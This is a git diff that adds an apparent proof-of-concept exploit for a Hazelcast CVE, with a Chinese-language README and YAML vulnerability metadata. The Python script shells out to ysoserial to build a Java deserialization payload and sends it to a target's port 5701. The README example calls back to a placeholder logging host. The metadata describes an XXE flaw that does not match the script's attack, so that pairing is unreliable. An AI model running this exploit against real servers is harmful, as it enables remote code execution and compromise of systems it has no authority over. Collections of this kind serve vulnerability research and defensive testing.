diff --git a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
new file mode 100644
index 0000000000000000000000000000000000000000..a7fac033e38e130e889d4d9a5b84a4e5653a29ed
--- /dev/null
+++ b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
@@ -0,0 +1,32 @@
+import socket
+import threading
+import time
+import sys
+import os
+groupName = b""
+clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+def socketRecv(clientSocket):
+    global groupName
+    while(1):
+        groupName += clientSocket.recv(1024)
+if __name__ == '__main__':
+
+    ip = sys.argv[1]
+    payloadType = sys.argv[2]
+    payload = sys.argv[3]
+
+    os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+    print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+    clientSocket.connect((ip, 5701))
+    obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
+    obj1.start()
+    file = open("1.ser", 'rb')
+    filebyte = file.read()
+    print(filebyte)
+    
+    print("输入 send 发送payload")
+    if(input("INPUT:")=="send"):
+        print(groupName)
+        clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
+    time.sleep(10)
+    clientSocket.close()
diff --git a/cve/hazelcast/2022/CVE-2022-0265/README.md b/cve/hazelcast/2022/CVE-2022-0265/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..7ebfefe80d605e9cd78b69ff460fa24088ec99a6
--- /dev/null
+++ b/cve/hazelcast/2022/CVE-2022-0265/README.md
@@ -0,0 +1,7 @@
+# CVE-2022-0265
+
+把 ysoserial.jar 放同目录下 
+
+**example** python CVE-2022-0265.py 127.0.0.1 URLDNS "http://xxx.log."
+
+![](poc.png)
diff --git a/cve/hazelcast/2022/CVE-2022-0265/poc.png b/cve/hazelcast/2022/CVE-2022-0265/poc.png
new file mode 100644
index 0000000000000000000000000000000000000000..a2412b116446380463c446fd8fa4d37a5ab73d2a
Binary files /dev/null and b/cve/hazelcast/2022/CVE-2022-0265/poc.png differ
diff --git a/cve/hazelcast/2022/yaml/CVE-2022-0265.yaml b/cve/hazelcast/2022/yaml/CVE-2022-0265.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d21d742764c86e4e8556dc6e86e0bb28798d25b9
--- /dev/null
+++ b/cve/hazelcast/2022/yaml/CVE-2022-0265.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-0265
+source: https://github.com/achuna33/CVE-2022-0265https://github.com/achuna33/CVE-2022-0265
+info:
+  name: Hazelcast是一个开源的可嵌入式数据网格。Hazelcast使得Java程序员更容易开发分布式计算系统，提供了很多Java接口的分布式实现，如：Map, Queue, Topic, ExecutorService, Lock, 以及 JCache等。
+  severity: critical
+  description: |
+    AbstractXmlConfigRootTagRecognizer()函数使用从SAXParserFactory生成的SAXParser，该SAXParser没有FEATURE_SECURE_PROCESSING集，可能会遭受XXE攻击。
+  scope-of-influence:
+    hazelcast 5.1
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2022-0265
+    - https://github.com/hazelcast/hazelcast/commit/4d6b666cd0291abd618c3b95cdbb51aa4208e748
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0265
+    cwe-id: CWE-611
+    cnvd-id: None
+    kve-id: None
+  tags: cve, xxe